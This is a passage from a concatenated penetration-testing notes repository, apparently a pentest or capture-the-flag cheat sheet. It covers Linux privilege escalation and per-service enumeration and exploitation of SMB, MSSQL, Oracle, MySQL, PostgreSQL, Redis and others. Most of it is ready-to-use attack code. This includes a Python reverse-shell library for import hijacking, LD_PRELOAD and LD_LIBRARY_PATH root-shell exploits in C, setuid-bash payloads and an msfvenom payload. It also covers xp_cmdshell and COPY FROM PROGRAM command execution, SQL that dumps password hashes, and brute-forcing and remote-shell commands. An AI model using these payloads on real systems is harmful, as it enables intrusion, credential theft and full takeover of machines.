`sudo` commands with no secure_path set)_: 374 | ```bash 375 | PATH=/tmp:$PATH 376 | ``` 377 | 378 | ## Exploiting capabilities 379 | - Possibly dangerous capabilities: 380 | ``` 381 | =ep, CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH, CAP_SETUID, CAP_SETGID, CAP_NET_RAW, CAP_SYS_ADMIN, 382 | CAP_SYS_PTRACE, CAP_SYS_MODULE, CAP_FORMER, CAP_SETFCAP 383 | ``` 384 | - Example exploiting `CAP_SETUID` set for python3: 385 | ```bash 386 | /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' 387 | ``` 388 | 389 | ## Python library hijacking 390 | - Check library loading locations order: 391 | ```bash 392 | python -c 'import sys; print "\n".join(sys.path)' # The first empty one is the current dir 393 | ``` 394 | - Create required library copy keeping the same class/method signature and populate with the reverse shell code: 395 | ```python 396 | import os 397 | import pty 398 | import socket 399 | 400 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 401 | s.connect(("",443)) 402 | os.dup2(s.fileno(),0) 403 | os.dup2(s.fileno(),1) 404 | os.dup2(s.fileno(),2) 405 | pty.spawn("/bin/bash") 406 | s.close() 407 | ``` 408 | - Put code in the proper location if possible. 409 | - Or modify PYTHONPATH env variable if sudo SETENV is set: 410 | ```bash 411 | sudo PYTHONPATH=/tmp/ /usr/bin/ 412 | ``` 413 | 414 | ## `LD_PRELOAD` exploit 415 | - If `env_keep+=LD_PRELOAD` is set, use this exploit. 416 | - `ld_preload_exploit.c`: 417 | ```C 418 | #include 419 | #include 420 | #include 421 | 422 | void _init() { 423 | unsetenv("LD_PRELOAD"); 424 | setresuid(0,0,0); 425 | system("/bin/bash -p"); 426 | } 427 | ``` 428 | - Compile it: 429 | ```bash 430 | gcc -shared -fPIC -nostartfiles -o /tmp/ld_preload.so ld_preload_exploit.c 431 | ``` 432 | - Run sudo program with `LD_PRELOAD`: 433 | ```bash 434 | sudo LD_PRELOAD=/tmp/ld_preload.so 435 | ``` 436 | 437 | ## `LD_LIBRARY_PATH` exploit 438 | - If `env_keep+=LD_LIBRARY_PATH` is set use this exploit. 439 | - Pick the shared library to replace: 440 | ```bash 441 | ldd 442 | ``` 443 | - `ld_library_path_exploit.c`: 444 | ```C 445 | #include 446 | #include 447 | 448 | static void hijack() __attribute__((constructor)) 449 | 450 | void hijack() { 451 | unsetenv("LD_LIBRARY_PATH"); 452 | setresuid(0,0,0); 453 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash"); // Or /bin/bash -p 454 | } 455 | ``` 456 | - Or create the file in one line: 457 | ```bash 458 | echo -e "#include \n#include \nstatic void hijack() __attribute__((constructor))\nvoid hijack() {\nunsetenv("LD_LIBRARY_PATH");\nsetresuid(0,0,0);\nsystem(\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash\");}" > ld_library_path_exploit.c 459 | ``` 460 | - Compile it: 461 | ```bash 462 | gcc -shared -fPIC -o ./ ld_library_path_exploit.c 463 | ``` 464 | - Run sudo program with `LD_LIBRARY_PATH`: 465 | ```bash 466 | sudo LD_LIBRARY_PATH=. 467 | ``` 468 | 469 | ## Compiling a shared library running bash shell 470 | - Use `strace` to search for not found shared libraries in the application running by root. 471 | - `bash_shared.c`: 472 | ```C 473 | #include 474 | #include 475 | 476 | static void inject() __attribute__((constructor)); 477 | void inject() { 478 | setuid(0); 479 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash"); // Or /bin/bash -p 480 | } 481 | ``` 482 | - Or create the file in one line: 483 | ```bash 484 | echo -e "#include \n#include \nstatic void inject() __attribute__((constructor));\nvoid inject() {\nsetuid(0);\nsystem(\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash\");}" > bash_shared.c 485 | ``` 486 | - Compile it to the .so shared library file: 487 | ```bash 488 | gcc -shared -fPIC -o .so bash_shared.c 489 | ``` 490 | 491 | ## Compiling a service running bash shell 492 | - `bash_service.c`: 493 | ```C 494 | int main() { 495 | setuid(0); 496 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash"); // Or /bin/bash -p 497 | } 498 | ``` 499 | - Or create the file in one line: 500 | ```bash 501 | echo -e "int main() {\nsetuid(0);\nsystem(\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash\");}" > bash_service.c 502 | ``` 503 | - Compile it to the service file: 504 | ```bash 505 | gcc -o bash_service.c 506 | ``` 507 | 508 | ## Permissions modification in NFS 509 | - Mount the NFS share: 510 | ```bash 511 | mkdir /tmp/mounted_share 512 | sudo mount -t nfs : /tmp/mounted_share/ -nolock 513 | ``` 514 | - Prepare the shell: 515 | ```bash 516 | sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/mounted_share/shell.elf 517 | ``` 518 | - Add permissions: 519 | ```bash 520 | sudo chmod +xs /tmp/mounted_share/shell.elf 521 | ``` 522 | - Run bash from the low privileged user on the target machine: 523 | ```bash 524 | ./shell.elf 525 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/sqlite/README.md: -------------------------------------------------------------------------------- 1 | # SQLite enumeration and exploitation 2 | * [Reading a database file](#reading-a-database-file) 3 | * [Enumerating a database](#enumerating-a-database) 4 | 5 | ## Reading a database file 6 | - Reading a database file `sqlite3` client: 7 | ```bash 8 | sqlite3 .sqlite # sqlite3 should be installed in /opt/homebrew on Apple Silicon 9 | ``` 10 | 11 | ## Enumerating a database 12 | - List tables: 13 | ```sqlite 14 | .table 15 | ``` 16 | - Dump values: 17 | ```sqlite 18 | select * from ; 19 | ``` 20 | - Exit: 21 | ```sqlite 22 | .exit 23 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/tcp-135-539-msrpc/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Remote Procedure Call _(MSRPC)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Dumping endpoints](#dumping-endpoints) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 135,539 -sT 8 | ``` 9 | 10 | ## Dumping endpoints 11 | ```bash 12 | rpcdump.py 13 | ``` 14 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-139-445-smb/README.md: -------------------------------------------------------------------------------- 1 | # Server Message Block _(SMB)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [SID enumeration](#sid-enumeration) 4 | * [Connecting to and enumerating an SMB share](#connecting-to-and-enumerating-an-smb-share) 5 | * [Uploading files](#uploading-files) 6 | * [Reverse shells](#reverse-shells) 7 | 8 | ## Initial enumeration 9 | - Nmap smb-enum scripts _(not comprehensive, consider using other options)_: 10 | ```bash 11 | nmap -vv -p 139,445 -sT --script=+smb-enum* 12 | ``` 13 | - Nmap All SMB scripts _(usually takes too long)_: 14 | ```bash 15 | nmap -vv -p 139,445 -sT --script=+smb* 16 | ``` 17 | - `enum4linux` all enumeration: 18 | ```bash 19 | enum4linux -a 20 | ``` 21 | - List shares: 22 | ```bash 23 | smbclient -L 24 | smbclient -L -U 25 | ``` 26 | - List shares with permissions: 27 | ```bash 28 | smbmap -H 29 | smbmap -H -u 'anonymous' 30 | smbmap -H -u 'anonymous' -p 'anonymous' 31 | smbmap -H -u -p '' 32 | ``` 33 | 34 | ## SID enumeration 35 | - Enumerate users using MSRPC _(requires access to the IPC$ share)_: 36 | ```bash 37 | lookupsid.py 38 | lookupsid.py :@ 39 | ``` 40 | 41 | ## Connecting to and enumerating an SMB share 42 | - Connect to a share: 43 | ```bash 44 | smbclient /// 45 | smbclient /// -U='anonymous%' 46 | smbclient /// -U='%' 47 | ``` 48 | - Enumerate files and folders: 49 | ```bash 50 | ls 51 | cd 52 | get 53 | ``` 54 | 55 | ## Uploading files 56 | ```bash 57 | put 58 | ``` 59 | 60 | ## Reverse shells 61 | ```bash 62 | psexec.py ':@' 63 | wmiexec.py ':@' 64 | winexe -U '%' // cmd.exe 65 | pth-winexe -U '%:' // cmd.exe 66 | ``` 67 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-1433-mssql/README.md: -------------------------------------------------------------------------------- 1 | # MSSQL enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to an MSSQL database](#connecting-to-an-mssql-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Getting NTLM hashes](#getting-ntlm-hashes) 6 | * [Executing system commands](#executing-system-commands) 7 | 8 | ## Initial enumeration 9 | ```bash 10 | nmap -vv -p 1433 -sT --script=+ms-sql* 11 | ``` 12 | 13 | ## Connecting to an MSSQL database 14 | - Connect to a database using `mssql-cli`: 15 | ```bash 16 | mssql-cli -U -P '' -d -S "tcp:,1433" 17 | mssql-cli -U -P '' -d -S "tcp:,1433" -E # Windows auth 18 | ``` 19 | - Or connect using `mssqlclient.py`: 20 | ```bash 21 | mssqlclient.py -db :''@ 22 | mssqlclient.py -db -windows-auth :''@ # Windows auth 23 | mssqlclient.py -db -hashes LMHASH:NTHASH @ -windows-auth # Using hashes instead of a password 24 | ``` 25 | 26 | ## Enumerating a database 27 | - Get version: 28 | ```SQL 29 | SELECT @@version; 30 | ``` 31 | - Get current database: 32 | ```SQL 33 | SELECT db_name(); 34 | ``` 35 | - List non-default databases: 36 | ```SQL 37 | SELECT name FROM master.sys.databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb'); 38 | ``` 39 | - Get current user: 40 | ```SQL 41 | SELECT original_login(); 42 | ``` 43 | - List user permissions: 44 | ```SQL 45 | SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 46 | ``` 47 | - Get current user's password hash _(encoded for 1731 hashcat mode)_: 48 | ```SQL 49 | SELECT convert(varchar(MAX),(loginproperty(original_login(),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1); 50 | ``` 51 | - List all users: 52 | ```SQL 53 | SELECT name FROM sys.syslogins ORDER BY 1; 54 | ``` 55 | - Get `sa` user's password hash _(encoded for 1731 hashcat mode)_: 56 | ```SQL 57 | SELECT convert(varchar(MAX),(loginproperty((char(115)+char(97)),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1); 58 | ``` 59 | - List tables: 60 | ```SQL 61 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 62 | ``` 63 | - List table columns: 64 | ```SQL 65 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 66 | ``` 67 | - Search for `%user%` like tables: 68 | ```SQL 69 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE char(37)+char(117)+char(115)+char(101)+char(114)+char(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- LIMIT/OFFSET works on 2012+ version 70 | ``` 71 | 72 | ## Getting NTLM hashes 73 | - Listen to SMB incoming connections: 74 | ```bash 75 | sudo responder -I tun0 76 | ``` 77 | - Sending auth SMB request to local machine using SQL: 78 | ```SQL 79 | EXEC xp_dirtree '\\\test'; 80 | ``` 81 | 82 | ## Executing system commands 83 | - Configure _(if user has privileges to do it)_: 84 | ```SQL 85 | EXEC sp_configure 'show advanced options', 1; 86 | RECONFIGURE; 87 | EXEC sp_configure 'xp_cmdshell', 1; 88 | RECONFIGURE; 89 | ``` 90 | - Run commands: 91 | ```SQL 92 | EXEC xp_cmdshell ''; 93 | ``` 94 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-1521-oracle_db/README.md: -------------------------------------------------------------------------------- 1 | # Oracle Database enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Brute-forcing a way in](#brute-forcing-a-way-in) 4 | * [Connecting to an Oracle database](#connecting-to-an-oracle-database) 5 | * [Enumerating a database](#enumerating-a-database) 6 | 7 | ## Initial enumeration 8 | ```bash 9 | nmap -vv -p 1521 -sT -A --script=+oracle* 10 | ``` 11 | 12 | ## Brute-forcing a way in 13 | - Guessing SIDs _(databases)_: 14 | ```bash 15 | odat sidguesser -s 16 | ``` 17 | - Brute-forcing both username and password _(using builtin list)_: 18 | ```bash 19 | odat passwordguesser -s -d --both-ul 20 | ``` 21 | - Brute-forcing password for the user: 22 | ```bash 23 | echo '' > username.txt 24 | odat passwordguesser -s -d --accounts-files $PWD/username.txt /Users/kali/rockyou.txt 25 | ``` 26 | 27 | ## Connecting to an Oracle database 28 | - Check available commands: 29 | ```bash 30 | odat all -s -d -U -P '' 31 | odat all -s -d -U -P '' --sysdba # Privileged 32 | ``` 33 | - Connect to a database: 34 | ```bash 35 | sqlplus '/@:/' 36 | sqlplus '/@:/' as sysdba # Privileged 37 | ``` 38 | - Improve formatting: 39 | ```SQL 40 | SET LINESIZE 32000; 41 | ``` 42 | 43 | ## Enumerating a database 44 | - Get version: 45 | ```SQL 46 | SELECT banner FROM v$version; 47 | SELECT version FROM v$instance; 48 | ``` 49 | - Get current database: 50 | ```SQL 51 | SELECT name from v$database; 52 | ``` 53 | - Get current user: 54 | ```SQL 55 | SELECT user FROM DUAL; 56 | ``` 57 | - Get current user permissions: 58 | ```SQL 59 | select * from user_role_privs; 60 | ``` 61 | - Get current user's password hash: 62 | ```SQL 63 | SELECT password FROM dba_users WHERE username=(SELECT user FROM DUAL); 64 | SELECT password FROM sys.user$ WHERE name=(SELECT user FROM DUAL); 65 | ``` 66 | - List all users: 67 | ```SQL 68 | SELECT username FROM dba_users ORDER BY 1; 69 | SELECT name FROM sys.user$ ORDER BY 1; 70 | ``` 71 | - Get default user's password hash: 72 | ```SQL 73 | SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash 74 | SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash 75 | SELECT password FROM dba_users WHERE lower(username)=(chr(104)||chr(114)); -- Get "hr" user's password hash 76 | SELECT password FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash 77 | SELECT password FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash 78 | SELECT password FROM sys.user$ WHERE lower(name)=(chr(104)||chr(114)); -- Get "hr" user's password hash 79 | ``` 80 | - List tables: 81 | ```SQL 82 | SELECT owner,table_name FROM all_tables ORDER BY 1; 83 | ``` 84 | - List table columns: 85 | ```SQL 86 | SELECT column_name FROM all_tab_columns WHERE table_name='' ORDER BY 1; 87 | ``` 88 | - Search for `%user%` like tables: 89 | ```SQL 90 | SELECT owner,table_name FROM all_tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- LIMIT/OFFSET works on 12.1+ version 91 | ``` 92 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-20-21-ftp/README.md: -------------------------------------------------------------------------------- 1 | # File Transfer Protocol _(FTP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to and enumerating an FTP server](#connecting-to-and-enumerating-an-ftp-server) 4 | * [Uploading files](#uploading-files) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | nmap -vv -p 20,21 -sT --script=+ftp* 9 | ``` 10 | 11 | ## Connecting to and enumerating an FTP server 12 | - Connect to the FTP server: 13 | ```bash 14 | ftp # Try common creds: anonymous:, anonymous:anonymous, ftp:ftp 15 | ``` 16 | - Bypass a firewall: 17 | ```bash 18 | passive 19 | ``` 20 | - Enumerate files and folders: 21 | ```bash 22 | ls -a # Always list hidden files as well 23 | cd 24 | 25 | binary # To download binary files 26 | ascii 27 | 28 | get 29 | ``` 30 | 31 | ## Uploading files 32 | ```bash 33 | binary # To upload binary files 34 | ascii 35 | 36 | put 37 | ``` 38 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-2049-nfs/README.md: -------------------------------------------------------------------------------- 1 | # Network File System _(NFS)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Share mounting](#share-mounting) 4 | 5 | ## Initial enumeration 6 | - Nmap NFS scripts: 7 | ```bash 8 | nmap -vv -p 2049 -sT --script=+nfs* 9 | ``` 10 | - List shares: 11 | ```bash 12 | showmount -e 13 | ``` 14 | 15 | ## Share mounting 16 | ```bash 17 | mkdir /tmp/mount 18 | sudo mount -t nfs : /tmp/mount/ -nolock 19 | sudo umount /tmp/mount 20 | ``` 21 | 22 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-22-ssh/README.md: -------------------------------------------------------------------------------- 1 | # Secure Shell _(SSH)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Generating and using SSH keys](#generating-and-using-ssh-keys) 4 | * [Connecting to an SSH server](#connecting-to-an-ssh-server) 5 | 6 | ## Initial enumeration 7 | - Nmap scanning: 8 | ```bash 9 | nmap -vv -p 22 -sT --script=+ssh* 10 | ``` 11 | 12 | ## Generating and using SSH keys 13 | - Generate an SSH key pair and print the public key: 14 | ```bash 15 | ssh-keygen -t rsa -C "kali@" 16 | # Enter the file path = ./id_rsa 17 | cat id_rsa.pub 18 | ``` 19 | - Add it to the `authorized_keys` file on the target machine: 20 | ```bash 21 | echo '' > ~/.ssh/authorized_keys 22 | ``` 23 | 24 | ## Connecting to an SSH server 25 | ``` 26 | ssh -i @ 27 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/tcp-23-telnet/README.md: -------------------------------------------------------------------------------- 1 | # Telnet enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a Telnet server](#connecting-to-a-telnet-server) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 23 -sT --script=+telnet* 8 | ``` 9 | 10 | ## Connecting to a Telnet server 11 | ```bash 12 | telnet 13 | ``` 14 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-25-465-587-smtp/README.md: -------------------------------------------------------------------------------- 1 | # Simple Mail Transfer Protocol _(SMTP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Brute-forcing usernames](#brute-forcing-usernames) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 25,465,587 -sT --script=+smtp* 8 | ``` 9 | 10 | ## Brute-forcing usernames 11 | - Brute-force usernames: 12 | ```bash 13 | smtp-user-enum -U /Users/kali/SecLists/Usernames/top-usernames-shortlist.txt -t 14 | smtp-user-enum -M RCPT -U /Users/kali/SecLists/Usernames/top-usernames-shortlist.txt -t 15 | smtp-user-enum -M EXPN -U /Users/kali/SecLists/Usernames/top-usernames-shortlist.txt -t 16 | 17 | smtp-user-enum -U /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -t 18 | smtp-user-enum -M RCPT -U /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -t 19 | smtp-user-enum -M EXPN -U /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -t 20 | ``` 21 | - Check if a single user exists: 22 | ```bash 23 | smtp-user-enum -u -t 24 | ``` 25 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-27017-mongodb/README.md: -------------------------------------------------------------------------------- 1 | # MongoDB enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a MongoDB database](#connecting-to-a-mongodb-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | nmap -vv -p 27017,27018 -sT --script=+mongodb* 9 | ``` 10 | 11 | ## Connecting to a MongoDB database 12 | - Using mongo CLI: 13 | ```bash 14 | mongo "mongodb://@:27017/" -p '' 15 | ``` 16 | 17 | ## Enumerating a database 18 | - Get configuration: 19 | ```SQL 20 | db.adminCommand({getParameter:"*"}) 21 | ``` 22 | - Get current user and roles: 23 | ```SQL 24 | db.runCommand({connectionStatus : 1}) 25 | ``` 26 | - Get users: 27 | ```SQL 28 | db.getUsers() 29 | db.getUser("") 30 | ``` 31 | - Get password hashes: 32 | ```bash 33 | wget https://raw.githubusercontent.com/philsmd/mongodb2hashcat/main/mongodb2hashcat.js 34 | mongo "mongodb://@:27017/" -p '' --quiet mongodb2hashcat.js # Use 24100 and 24200 hashcat modes to crack them 35 | ``` 36 | - Show databases: 37 | ```SQL 38 | show dbs 39 | ``` 40 | - Show current dabase: 41 | ```SQL 42 | db 43 | ``` 44 | - Change database: 45 | ```SQL 46 | use 47 | ``` 48 | - Show collections: 49 | ```SQL 50 | show collections 51 | ``` 52 | - Show data: 53 | ```SQL 54 | db..find() 55 | db..find().pretty() 56 | ``` 57 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-3306-mysql/README.md: -------------------------------------------------------------------------------- 1 | # MySQL enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a MySQL database](#connecting-to-a-mysql-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Saving anything to a file](#saving-anything-to-a-file) 6 | * [UDF PrivEsc](#udf-privesc) 7 | 8 | ## Initial enumeration 9 | ```bash 10 | nmap -vv -p 3306 -sT --script=+mysql* 11 | ``` 12 | 13 | ## Connecting to a MySQL database 14 | - Connect to a database using `mysql` client: 15 | ```bash 16 | mysql -u -p -h -P 3306 17 | ``` 18 | - Connect using `mysqlsh` _(X Protocol)_: 19 | ```bash 20 | mysqlsh --mysqlx -u -p -h -P 33060 -D 21 | ``` 22 | 23 | ## Enumerating a database 24 | - Get version: 25 | ```SQL 26 | SELECT @@version; 27 | ``` 28 | - Get current database: 29 | ```SQL 30 | SELECT database(); 31 | ``` 32 | - Get current user: 33 | ```SQL 34 | SELECT current_user(); 35 | ``` 36 | - Get current user's password hash: 37 | ```SQL 38 | SELECT password FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- Some databases still use password column 39 | SELECT authentication_string FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); 40 | SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- A current user's password hash encoded for the 7401 hashcat mode. Use this if a password hash has non-ASCII characters. 41 | ``` 42 | - List all users: 43 | ```SQL 44 | SELECT user FROM mysql.user ORDER BY 1; 45 | ``` 46 | - Get default user's password hash: 47 | ```SQL 48 | SELECT password FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. Some databases still use password column 49 | SELECT authentication_string FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. 50 | SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- A root user's password hash encoded for the 7401 hashcat mode. Use this if a password hash has non-ASCII characters. 51 | ``` 52 | - List tables: 53 | ```SQL 54 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 55 | ``` 56 | - List table columns: 57 | ```SQL 58 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 59 | ``` 60 | - Search for `%user%` like tables: 61 | ```SQL 62 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE concat(char(37),char(117),char(115),char(101),char(114),char(37)) ORDER BY 1 LIMIT 1 OFFSET 0; 63 | ``` 64 | 65 | ## Saving anything to a file 66 | - Usually MySQL has permissions to write into the `/var/lib/mysql` folder: 67 | ```SQL 68 | select '' into outfile '/var/lib/mysql/cmd.php'; 69 | ``` 70 | 71 | ## UDF PrivEsc 72 | - Check if MySQL demon is running as root. 73 | - Compile this exploit: https://raw.githubusercontent.com/1N3/PrivEsc/master/mysql/raptor_udf2.c 74 | 75 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-3389-rdp/README.md: -------------------------------------------------------------------------------- 1 | # Remote Desktop Protocol _(RDP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a machine](#connecting-to-a-machine) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 3389 -sT --script=+rdp* 8 | ``` 9 | 10 | ## Connecting to a machine 11 | ```bash 12 | xfreerdp +clipboard /w:1280 /h:720 /smart-sizing /cert:ignore /v: /u: /p:'' 13 | ``` 14 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-53-dns/README.md: -------------------------------------------------------------------------------- 1 | # Domain Name System _(DNS)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Zone transfer](#zone-transfer) 4 | 5 | ## Initial enumeration 6 | - Nmap DNS scripts: 7 | ```bash 8 | nmap -vv -p 53 -sT --script=+dns* --script-args "dns-nsec-enum.domains='',dns-nsec3-enum.domains='',dns-brute.domain=''" 9 | ``` 10 | - Common enumeration with `dnsenum`: 11 | ```bash 12 | dnsenum --noreverse --enum --dnsserver 13 | ``` 14 | 15 | ## Zone transfer 16 | ```bash 17 | dig axfr @ 18 | ``` 19 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-5432-pgsql/README.md: -------------------------------------------------------------------------------- 1 | # PostgreSQL enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a PostgreSQL database](#connecting-to-a-postgresql-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Arbitrary File Read _(AFR)_](#arbitrary-file-read-afr) 6 | * [Remote Code Execution _(RCE)_](#remote-code-execution-rce) 7 | 8 | ## Initial enumeration 9 | ```bash 10 | nmap -vv -p 5432 -sT --script=+pgsql* 11 | ``` 12 | 13 | ## Connecting to a PostgreSQL database 14 | ```bash 15 | psql "dbname= host= user= password= port=5432" 16 | ``` 17 | 18 | ## Enumerating a database 19 | - Get version: 20 | ```SQL 21 | SELECT version(); 22 | ``` 23 | - Get current database: 24 | ```SQL 25 | SELECT current_database(); 26 | ``` 27 | - Get current user: 28 | ```SQL 29 | SELECT current_user; 30 | ``` 31 | - Get current user's password hash: 32 | ```SQL 33 | SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=current_user 34 | ``` 35 | - List all users: 36 | ```SQL 37 | SELECT rolname FROM pg_catalog.pg_authid ORDER BY 1; 38 | ``` 39 | - Get default user's password hash: 40 | ```SQL 41 | SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=(chr(112)||chr(111)||chr(115)||chr(116)||chr(103)||chr(114)||chr(101)||chr(115)) -- "postgres" user 42 | ``` 43 | - List tables: 44 | ```SQL 45 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 46 | ``` 47 | - List table columns: 48 | ```SQL 49 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 50 | ``` 51 | - Search for `%user%` like tables: 52 | ```SQL 53 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 LIMIT 1 OFFSET 0; 54 | ``` 55 | 56 | ## Arbitrary File Read _(AFR)_ 57 | - Directory listing: 58 | ```SQL 59 | select pg_ls_dir(''); 60 | ``` 61 | - Read a file: 62 | ```SQL 63 | DROP TABLE IF EXISTS temp; 64 | CREATE TABLE temp(t TEXT); 65 | COPY temp FROM ''; 66 | SELECT * FROM temp; 67 | ``` 68 | 69 | ## Remote Code Execution _(RCE)_ 70 | ```SQL 71 | DROP TABLE IF EXISTS cmd_exec; 72 | CREATE TABLE cmd_exec(cmd_output TEXT); 73 | COPY cmd_exec FROM PROGRAM ''; 74 | SELECT * FROM cmd_exec; 75 | ``` 76 | 77 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-5985-5986-winrm/README.md: -------------------------------------------------------------------------------- 1 | # Windows Remote Management _(WinRM)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Reverse shells](#reverse-shells) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 5985,5986 -sT 8 | ``` 9 | 10 | ## Reverse shells 11 | ```bash 12 | evil-winrm -i -u -p 13 | evil-winrm -i -u -H 14 | ``` 15 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-6379-redis/README.md: -------------------------------------------------------------------------------- 1 | # Redis enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a Redis database](#connecting-to-a-redis-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Writing data to a file](#writing-data-to-a-file) 6 | 7 | ## Initial enumeration 8 | ```bash 9 | nmap -vv -p 6379 -sT --script=+redis* 10 | ``` 11 | 12 | ## Connecting to a Redis database 13 | ```bash 14 | redis-cli -h -p 6379 -a # versions prior of Redis 6 15 | redis-cli -h -p 6379 --user default --pass 16 | ``` 17 | 18 | ## Enumerating a database 19 | - Get database info: 20 | ```bash 21 | INFO all 22 | ``` 23 | - Select a database 24 | ```bash 25 | SELECT 26 | ``` 27 | - List keys: 28 | ```bash 29 | KEYS 30 | ``` 31 | - Get value for a key: 32 | ```bash 33 | GET 34 | ``` 35 | 36 | ## Writing data to a file 37 | - SSH RCE: 38 | ```bash 39 | ssh-keygen -t rsa -C "kali@" # File path = ./id_rsa 40 | cat ./id_rsa | redis-cli -h -p 6379 -a -x set somekey 41 | redis-cli -h -p 6379 -a 42 | 43 | CONFIG SET rdbcompression no 44 | CONFIG 